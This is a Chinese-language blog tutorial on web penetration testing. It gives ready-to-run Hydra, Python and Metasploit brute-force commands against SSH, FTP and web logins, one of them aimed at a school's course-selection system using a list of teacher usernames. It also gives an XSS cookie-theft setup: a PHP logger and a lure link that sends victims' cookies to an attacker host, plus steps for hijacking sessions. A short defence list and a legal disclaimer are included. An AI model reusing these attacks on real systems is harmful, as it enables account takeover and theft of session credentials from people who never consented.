<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="网络安全Web渗透, Note">
    <meta name="description" content="包括密码爆破、SQL注入、XSS跨站脚本攻击、文件上传漏洞等">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>网络安全Web渗透 | Note</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="/favicon.ico">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Note</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Note</div>
        <div class="logo-desc">
            
            公网域名：xiaolily.cn
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">网络安全Web渗透</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">网络安全</span>
                            </a>
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" class="post-category">
                                网络安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-11-10
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-03-27
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    12 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="密码爆破"><a href="#密码爆破" class="headerlink" title="密码爆破"></a>密码爆破</h1><h2 id="一、爆破HTTP表单密码"><a href="#一、爆破HTTP表单密码" class="headerlink" title="一、爆破HTTP表单密码"></a>一、爆破HTTP表单密码</h2><h3 id="1-Hydra爆破"><a href="#1-Hydra爆破" class="headerlink" title="1.Hydra爆破"></a>1.Hydra爆破</h3><ol>
<li>启动OWASP漏洞靶机</li>
<li>输入IP地址打开网页</li>
<li>打开Damn Vulnerable Web Application</li>
<li>开始抓包，在登录界面按下F12，选中Network选项卡，随便输入账号密码，点击Login。</li>
<li>成功抓取到login.php，记录Request URL、Form Data以及Response</li>
<li>打开kali虚拟机，右键打开终端</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">hydra -l admin -P passw.txt 192.168.148.130 http-post-form "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:Login failed" -V<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><code>-l</code>表示单个用户名（使用<code>-L</code>表示用户名字典）<br><code>-P</code>表示使用密码字典<br><code>-V</code>用于显示每次尝试的详细输出<br><code>-o</code>表示保存结果到文件<br><code>-f</code>表示只要破解到第一个有效密码就停止<br><code>:</code>后是登录失败表单返回的信息</p>
<h3 id="2-Python爆破"><a href="#2-Python爆破" class="headerlink" title="2.Python爆破"></a>2.Python爆破</h3><p>登录进DVWA漏洞靶机之后，靶机给我们提供了一个暴力破解密码的接口，就是第四个，Brute Force<br>为了深入理解爆破原理，这次我们不用工具，自己写代码进行破解，这里使用最简单的Python</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests

pwds <span class="token operator">=</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"password.txt"</span><span class="token punctuation">)</span>
<span class="token keyword">for</span> pwd <span class="token keyword">in</span> pwds<span class="token punctuation">:</span>
    url <span class="token operator">=</span> <span class="token string">"http://192.168.26.131/dvwa/vulnerabilities/brute/"</span>
    <span class="token comment"># Python strip() 方法用于移除字符串头尾指定的字符（默认为空格或换行符）或字符序列。</span>
    resp <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url <span class="token operator">=</span> url<span class="token punctuation">,</span> 
    params <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"username"</span><span class="token punctuation">:</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">:</span>pwd<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"Login"</span><span class="token punctuation">:</span><span class="token string">"Login"</span><span class="token punctuation">}</span><span class="token punctuation">,</span> 
    <span class="token comment"># 身份信息，即cookie，必须是最新的，有效的</span>
    headers <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"Cookie"</span><span class="token punctuation">:</span>"security<span class="token operator">=</span>low<span class="token punctuation">;</span> \
        PHPSESSID<span class="token operator">=</span>jbvcllt5hbruibl548pco9pq71<span class="token punctuation">;</span> acopendivids<span class="token operator">=</span>swingset<span class="token punctuation">,</span>jotto<span class="token punctuation">,</span>phpbb2<span class="token punctuation">,</span>redmine<span class="token punctuation">;</span> acgroupswithpersist<span class="token operator">=</span>nada"<span class="token punctuation">}</span><span class="token punctuation">)</span>
    <span class="token comment">#print(resp.text)</span>
    <span class="token keyword">if</span> <span class="token string">'Username and/or password incorrect.'</span> <span class="token keyword">in</span> resp<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'破解失败：'</span><span class="token operator">+</span>pwd<span class="token punctuation">,</span> end<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'破解成功：'</span><span class="token operator">+</span>pwd<span class="token punctuation">,</span> end<span class="token operator">=</span><span class="token string">''</span><span class="token punctuation">)</span>
        <span class="token keyword">break</span>
pwds<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>和之前一样，抓包，然后模拟浏览器发送请求，唯一不同的就是需要注意，发送的请求需携带身份信息，因为这个操作必须在登录状态才可以执行</p>
<h3 id="3-BurpSuite爆破"><a href="#3-BurpSuite爆破" class="headerlink" title="3.BurpSuite爆破"></a>3.BurpSuite爆破</h3><ol>
<li><p>在Kali中打开BurpSuite，设置代理（proxy）的设置的端口为允许所有端口</p>
</li>
<li><p>打开火狐浏览器-设置-网络设置-手动配置代理-设置为Kali机器的IP</p>
</li>
<li><p>在火狐浏览器中提交表单，请求就已经被代理服务器拦截了</p>
</li>
<li><p>回到BurpSuite可以看到被拦截包的具体内容，右键，Send to Intruder</p>
</li>
<li><p>打开Intruder选项卡，clear$，add$</p>
</li>
<li><p>在Payload载荷中添加进字典，就可以开始爆破了</p>
</li>
</ol>
<h4 id="几种攻击模式"><a href="#几种攻击模式" class="headerlink" title="几种攻击模式"></a>几种攻击模式</h4><ol>
<li>Sniper 狙击手<br>只能破解一个字段，即只能选择一个payloadset。</li>
<li>Battering ram 攻城锤<br>不管有几个参数，都只能用相同的字典值</li>
<li>Pitchfork 草叉<br>有几个参数就需要设置几个字典，而且会按顺序匹配同时使用，不会交叉验证。<br>如果两个payload的数量不匹配，以少的为准，多余的丢弃。</li>
<li>Cluster bomb 榴霰弹<br>产生笛卡尔积，简单来说就是和草叉相反。</li>
</ol>
<h3 id="4-爆破机房选课系统登录密码"><a href="#4-爆破机房选课系统登录密码" class="headerlink" title="4.爆破机房选课系统登录密码"></a>4.爆破机房选课系统登录密码</h3><p>先不要看答案，自己试一试</p>
<pre class="line-numbers language-none"><code class="language-none">hydra -l pwh -p password.txt 10.163.72.11 http-post-form "/index/index/login.html:username=^USER^&amp;password=^PASS^:失败" -V -o JJ.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="二、爆破SSH密码"><a href="#二、爆破SSH密码" class="headerlink" title="二、爆破SSH密码"></a>二、爆破SSH密码</h2><h3 id="1-端口扫描"><a href="#1-端口扫描" class="headerlink" title="1.端口扫描"></a>1.端口扫描</h3><ol>
<li>ping扫描  <code>—sP</code><pre class="line-numbers language-none"><code class="language-none">nmap -sP 10.163.72.1/24<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>指定端口范围  <code>—p m-n</code><pre class="line-numbers language-none"><code class="language-none">nmap -p 22,80 10.163.72.55 #-p- 表示对所有端口进行扫描<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>服务版本探测 <code>-sV</code><pre class="line-numbers language-none"><code class="language-none">nmap -p 22,80 10.163.72.55 -sV<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>全面扫描 <code>-A</code><pre class="line-numbers language-none"><code class="language-none">nmap -A 10.163.72.55<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>保存结果<pre class="line-numbers language-none"><code class="language-none">nmap -sn 101.37.79.1/24 -oX JJ.xml #默认保存在nmap安装根目录<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>其他参数</li>
</ol>
<ul>
<li>端口状态：<a target="_blank" rel="noopener" href="https://blog.csdn.net/lee244868149/article/details/39177669">https://blog.csdn.net/lee244868149/article/details/39177669</a></li>
<li><code>-Pn</code>参数可以停止ICMP请求，避免触发防火墙的安全机制</li>
<li><code>-v</code>表示需要持续返回解析的信息</li>
<li><code>-T4</code>表示采用什么速度进行探测，范围0-5</li>
</ul>
<h3 id="2-用户名枚举"><a href="#2-用户名枚举" class="headerlink" title="2.用户名枚举"></a>2.用户名枚举</h3><ol>
<li>在kail里输入msfconsole打开msf，退出输入exit</li>
<li>因为msf中的模块太多了，我们想要找ssh有关的模块，只有使用搜索功能。<pre class="line-numbers language-none"><code class="language-none">search ssh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>找到用户枚举的模块<pre class="line-numbers language-none"><code class="language-none">use auxiliary/scanner/ssh/ssh_enumusers<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>查看参数设置<pre class="line-numbers language-none"><code class="language-none">show options<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>设置必要的参数<pre class="line-numbers language-none"><code class="language-none">set threshold 5  # 设置线程数为5
set rhosts 192.168.148.130  #  设置地址，地址也可以是一个网段
set USER_FILE teacher_name.txt # 设置需要使用的账号字典<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></li>
<li>运行<pre class="line-numbers language-none"><code class="language-none">run<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
</ol>
<h3 id="3-开始爆破"><a href="#3-开始爆破" class="headerlink" title="3.开始爆破"></a>3.开始爆破</h3><pre class="line-numbers language-none"><code class="language-none">hydra -l root -P password.txt 192.168.148.130 ssh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>也可以使用msf，感觉速度会更快一些，操作和上述相似，只有两步不同。</p>
<ol>
<li>找到相应模块<pre class="line-numbers language-none"><code class="language-none">use auxiliary/scanner/ssh/ssh_login<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>设置必要参数<pre class="line-numbers language-none"><code class="language-none">set rhosts 192.168.26.130
set username root
set PASS_FILE password.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h2 id="三、爆破FTP密码"><a href="#三、爆破FTP密码" class="headerlink" title="三、爆破FTP密码"></a>三、爆破FTP密码</h2>账号字典和密码字典我的ftp：pwhdown<br>不要问账号字典怎么来的，问就是捡来的<pre class="line-numbers language-none"><code class="language-none">hydra -L teacher_name.txt -P pass.txt -f 10.163.72.248 ftp -o JJ.txt -V<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
</ol>
<h2 id="四、防御"><a href="#四、防御" class="headerlink" title="四、防御"></a>四、防御</h2><ol>
<li>密码使用带https的密文传输和存储</li>
<li>限制错误次数，锁定账户</li>
<li>增加尝试间隔，sleep(3)</li>
<li>验证码，图片验证码、短信验证码、二维码验证码</li>
<li>统计尝试频率，锁定IP地址</li>
<li>token机制</li>
</ol>
<h2 id="四、特别声明"><a href="#四、特别声明" class="headerlink" title="四、特别声明"></a>四、特别声明</h2><p>本网站没有使用登录验证码，可以无限暴力破解，因为这种漏洞不会危害服务器，所以大家随便玩吧（只有我的账号是超级管理员，是强密码，所以可以不用白费工夫了）。</p>
<p>特别声明一点，本网站是用于海盐商贸学校计算机专业实战演练的漏洞靶机网站，只能用于学习网络安全相关知识，磨练技能，请记得我们是白帽子阵营，请勿违反<strong>《中华人民共和国网络安全法》</strong>，从事违法犯罪，否则后果自负</p>
<h1 id="XSS跨站脚本攻击"><a href="#XSS跨站脚本攻击" class="headerlink" title="XSS跨站脚本攻击"></a>XSS跨站脚本攻击</h1><h2 id="一、常用Javascript语句"><a href="#一、常用Javascript语句" class="headerlink" title="一、常用Javascript语句"></a>一、常用Javascript语句</h2><h3 id="1-弹窗警告"><a href="#1-弹窗警告" class="headerlink" title="1.弹窗警告"></a>1.弹窗警告</h3><pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'你好，恭喜，你账号密码没了'</span><span class="token punctuation">)</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h3 id="2-页面嵌套"><a href="#2-页面嵌套" class="headerlink" title="2.页面嵌套"></a>2.页面嵌套</h3><pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iframe</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>http://10.163.72.55</span> <span class="token attr-name">width</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>300</span> <span class="token attr-name">height</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span>300</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>iframe</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="3-页面重定向"><a href="#3-页面重定向" class="headerlink" title="3.页面重定向"></a>3.页面重定向</h3><pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"本站已停用，请移步到我们新网站并重新登录"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://10.163.72.55/"</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="4-访问外部js"><a href="#4-访问外部js" class="headerlink" title="4.访问外部js"></a>4.访问外部js</h3><pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://10.163.72.55/xss.js<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token script"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="二、手动获取cookie"><a href="#二、手动获取cookie" class="headerlink" title="二、手动获取cookie"></a>二、手动获取cookie</h2><ol>
<li>另外打开一台kail的虚拟机，作为攻击机</li>
<li>启动apache服务器<pre class="line-numbers language-none"><code class="language-none">service apache2 start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>在网站根目录写入一个盗取cookie的js脚本<pre class="line-numbers language-none"><code class="language-none">vim /var/www/html/get_cookie.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$cookie</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cookie'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  <span class="token comment"># 获取cookie</span>
<span class="token variable">$log</span> <span class="token operator">=</span> <span class="token function">fopen</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"cookie.txt"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 以追加方式打开文件，如果没有会自动创建</span>
<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">,</span> <span class="token variable">$cookie</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 保存文件，记得换行</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 关闭文件</span>
<span class="token keyword">echo</span> <span class="token string single-quoted-string">'恭喜，你密码账号没了'</span><span class="token punctuation">;</span>  <span class="token comment"># 嘲讽拉满</span>
<span class="token delimiter important">?&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<em>注意在linux中，ctrl+shift+v才是复制，或者直接按鼠标滚轮也可以</em></li>
<li>常用vim命令（补充）</li>
</ol>
<ul>
<li><code>i</code>插入模式</li>
<li><code>o</code>在下一行插入</li>
<li><code>esc + :wq</code>保存并退出</li>
<li><code>esc + :e!</code>不保存退出</li>
<li><code>ctrl+v</code>可视块操作，<code>I</code>插入，<code>esc</code>保存，<code>d</code>删除</li>
</ul>
<ol start="5">
<li>在地址栏输入kali虚机的ip地址/get_cookie.php，如果没有报404错误，就表示文件存在，当然也可以cat /var/www/html/get_cookie.php再次确认一下</li>
<li>打开根目录下的写权限<pre class="line-numbers language-none"><code class="language-none">ls -s # 查看权限<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-none"><code class="language-none">chown -R www-data.www-data /var/www/<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>登录DVWA靶机，选择XSS stored，现在可以布置脚本了，注意这里的诱导文字很重要，很考验水平。<pre class="line-numbers language-html" data-language="html"><code class="language-html">&lt;a href=javascript:location.href="http://10.163.72.55:8090/get_cookie.php?cookie="+document.cookie&gt;兄弟、我找到你想要的资源了，懂的都懂，快来！<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>受害者只需要点一下，就可以获得cookie了<pre class="line-numbers language-none"><code class="language-none">cat /var/www/html/cookie.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>盗取账号<br>拿到cookie之后怎么用呢，其实这个cookie就是浏览器缓存的用户身份信息，最简单的方法是安装一个谷歌浏览器插件进行替换，我已经帮你们下载好了，在我的ftp，<strong>pwhdown</strong>，<strong>Cookie Hacker.crx</strong></li>
</ol>
<p><em>在谷歌浏览器安装插件时，记得打开开发者模式</em></p>
<h2 id="三、设置桥接模式"><a href="#三、设置桥接模式" class="headerlink" title="三、设置桥接模式"></a>三、设置桥接模式</h2><p>因为NAT连接的是虚拟交换机，自己的几个虚拟机网卡接到一起，只能自己和自己玩。<br>如果想要连接到真实交换机，先在VMvare点编辑-虚拟网络编辑器-添加网络-VMnet0，选桥接模式，桥接到真实网卡，别连到蓝牙上去了。<br>然后在虚拟机设置中，选择VMnet0（桥接模式），如果外部没有DHCP服务器，我们不能自动获取一个ip地址，就需要自己手动设置一个ip地址。在linux中的方法如下：</p>
<ol>
<li>修改网卡配置文件<pre class="line-numbers language-none"><code class="language-none">vim /etc/network/interfaces<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-none"><code class="language-none">auto eth0
iface eth0 inet static  # 配置eth0使用静态地址
address 10.163.72.194   # 配置固定IP地址
netmask 255.255.255.0   # 配置子网掩码
gateway 10.163.72.20    # 配置网关<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<em>提示：配置IP地址之前ping一下，如果提示无法访问目标主机，说明应该没人用。</em></li>
<li>重启网络<pre class="line-numbers language-none"><code class="language-none">systemctl restart networking<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>关闭networkManager<br>如果没有生效，可能networkManager影响了，networkManager是网络服务的图形管理工具，它会默认接管网络服务。<pre class="line-numbers language-none"><code class="language-none">systemctl stop NetworkManager<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>配置DNS<pre class="line-numbers language-none"><code class="language-none">vim /etc/resolv.conf<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-none"><code class="language-none">nameserver 114.114.114.114<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li>
<li>查看IP是否修改完成<pre class="line-numbers language-none"><code class="language-none">ifconfig
ifconfig eth0 192.168.1.1 # 配置临时IP<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<em>如果嫌麻烦，可以配置临时ip，不过重启网络服务就没了</em></li>
</ol>
<h2 id="四、自动化XSS工具beef"><a href="#四、自动化XSS工具beef" class="headerlink" title="四、自动化XSS工具beef"></a>四、自动化XSS工具beef</h2><ol>
<li>启动beef<br>第一次启动可能要设置密码，设置密码之后，beef就启动好了<br>beef会提供一个访问地址，127.0.0.1:3000/ui/panel，注意这个地址是本地环回地址，如果想在真机访问，需要把ip换成虚机的ip<br><em>如果设置的密码忘了，可以输入cat /etc/beef-xss/config.yaml查看密码</em></li>
